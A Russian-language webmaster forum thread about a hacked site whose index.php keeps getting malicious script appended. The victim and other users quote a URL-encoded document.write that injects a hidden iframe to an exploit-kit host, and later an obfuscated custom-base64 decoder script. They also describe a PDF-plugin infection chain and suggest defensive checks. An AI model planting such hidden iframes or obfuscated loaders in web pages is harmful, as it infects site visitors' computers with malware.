Добрый день, дорогие форумчане! Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал: HTML: <script language="javascript"> document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E ')); </script> Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты. В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое. Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало. Прошу вашей помощи, помогите разобраться, что, к чему. Спасибо!
Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один
Code: <iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe> хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой
То что это шелл - врятли... Это скорее троянчик... причем недавно сделаннный... Code: <iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe> Открыл я этот сайт... Вот че получается. ПРи зарузке ентого сайтика грузится PDF документ прямо в браузере. Затем этот PDF документ каким-то образом загружает на комп основную вирусяку e.exe, которая сохраняется в папке C:\Documents and Settings\{USER}\Local Settings\Temp и опять же как-то запускает ее (КАК!?). Вот отчеты по e.exe: Code: http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae58aa1d152fa8c1b-1245078728 Это лично у меня так было. Можете конечно сами попробывать, если хотите. Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =))
Нет. Я так не думаю. Просто стало интересно как такое можно осуществить... И я думаю не только одному мне...
http://truba5.cn/stats.php связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144
Много связок грузятся через яваскрипт, неужели трудна разработчикам браузеров проконтролировать действия яваскрипта? Я видел как исхещряюца с кодом чтобы обмануть браузер,но все же... По поводу pdf, интересная идея, грузить троя через дыру в плагине.. Фантазии нет придела! А чтобы не вычищать каждый день ифрэймы и яваскрипты, то надо хранить на балванке копию сайта и если какието произошли изменения, то файлики обновить и все, просто если сайт большой, замаешься чистить. А еще хорошо спрятанный шелл хрен найдешь.
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
Блин, сегодня захожу, там уже другая ***ня: HTML: <script language="javascript">function _lUPNLpHJVX7T3P( _lXm9tW7QM2MwHU ){var _lxQthEExSQdZZz = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";var _lxXJqmgSlQpjg1 = '';var _lbtojDbzx931xM = 18;var _lHQlhGZ4PFhvYJ = 0;for ( var _lBDsi5JRjsUAiH = 0; _lBDsi5JRjsUAiH < _lXm9tW7QM2MwHU.length; _lBDsi5JRjsUAiH++ ) { var _l9b9wnGDPoJpiY = _lxQthEExSQdZZz.indexOf( _lXm9tW7QM2MwHU.charAt( _lBDsi5JRjsUAiH ) ); if ( _lbtojDbzx931xM == 0 ) { _lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY; var _luGKJPMN7vIHCr = ( _lHQlhGZ4PFhvYJ & 0xFF0000 ) >> 16;if ( _luGKJPMN7vIHCr != 0 ) {_lxXJqmgSlQpjg1 += String.fromCharCode( _luGKJPMN7vIHCr );}var _l0XsYfs0eeeliu = ( _lHQlhGZ4PFhvYJ & 0xFF00 ) >> 8;if ( _l0XsYfs0eeeliu != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _l0XsYfs0eeeliu );}var _lPrZyGK4RUKehH = _lHQlhGZ4PFhvYJ & 0xFF;if ( _lPrZyGK4RUKehH != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _lPrZyGK4RUKehH );}_lHQlhGZ4PFhvYJ = 0;_lbtojDbzx931xM = 18;} else {_l9b9wnGDPoJpiY = _l9b9wnGDPoJpiY << _lbtojDbzx931xM;_lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY;_lbtojDbzx931xM -= 6;}}return _lxXJqmgSlQpjg1;} document.write( _lUPNLpHJVX7T3P( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOaXGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );</script> Помогите, хелп, приклеевается в конец документа index.php Что делать? Вири на компе подавил
